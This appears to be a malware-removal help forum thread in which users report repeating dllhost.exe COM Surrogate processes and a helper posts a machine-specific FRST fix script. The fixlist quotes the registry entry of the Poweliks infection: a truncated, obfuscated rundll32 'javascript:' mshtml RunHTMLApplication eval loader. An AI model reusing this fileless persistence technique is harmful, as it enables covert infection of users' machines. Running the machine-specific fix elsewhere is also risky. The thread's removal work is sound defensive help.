Yesterday I started getting warnings from Avast blocking webpages (I was not online, I was in a game with no browser open). Avast seemed to block everything but when I check my task manager I saw several dllhost.exe*32 COM Surrogates. I was able to end their tasks but 5-10 minutes later they started up again. (I was not using the computer this weekend and when I came back Sunday the first thing I did was launch a game and teamspeak 3, so I am not sure what caused this. Avast and MBAM have not seemed to have a problem blocking anything today.
The process being blocked is SysWOW64\dllhost.exe. I saw others post this same thing happening to them yesterday so something must have happened the same time.
Quick update, the COM Surrogates come every 5 minutes like clockwork, MBAM still blocking all of it but I need to close the surrogates myself in task manager. Anyone able to help?
CAUTION : This fix is only valid for this specific machine, using it on another may break your computer
Open notepad and copy/paste the text in the quotebox below into it:
HKU\S-1-5-21-1977768418-3833106981-970839474-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File
CustomCLSID: HKU\S-1-5-21-1977768418-3833106981-970839474-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
EmptyTemp:
CMD: bitsadmin /reset /allusers
Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated please post that
WARNING:Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
See this article
I would recommend that you completely uninstall Java unless you need it to run an important software.
In that instance I would recommend that you disableJava in your browsers until you need it for that software and then enable it. (See How to diasble Java in your web browser and How to unplug Java from the browser)
Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:
CryptoPrevent install this programme to lock down and prevent crypto ransome ware
I wasn’t sure if I should start a new post or what, so I figured I’d reply in this thread.
I started having the same issues within the last day or so on my system. I noticed I was slowing down some and having random weird issues (screen flashing, what seemed to be small window popups while in games).
This morning after booting up my system, it seemed to be slow in opening web pages. I checked my processes and noticed multiple dllhost.exe*32 COMSurrogate processes on my system, using large amounts of memory.
I have never noticed any processes like this before.
I ran AVAST a couple of days ago and it seemed to catch several Trojans and quarantine them, so I thought I was free of any more problems. Then this started yesterday.
I downloaded FRST and ran it to generate logs. I will attach them here.
I would appreciate any help that you may be able to give.
WARNING:Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
See this article
I would recommend that you completely uninstall Java unless you need it to run an important software.
In that instance I would recommend that you disableJava in your browsers until you need it for that software and then enable it. (See How to diasble Java in your web browser and How to unplug Java from the browser)
Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:
CryptoPrevent install this programme to lock down and prevent crypto ransome ware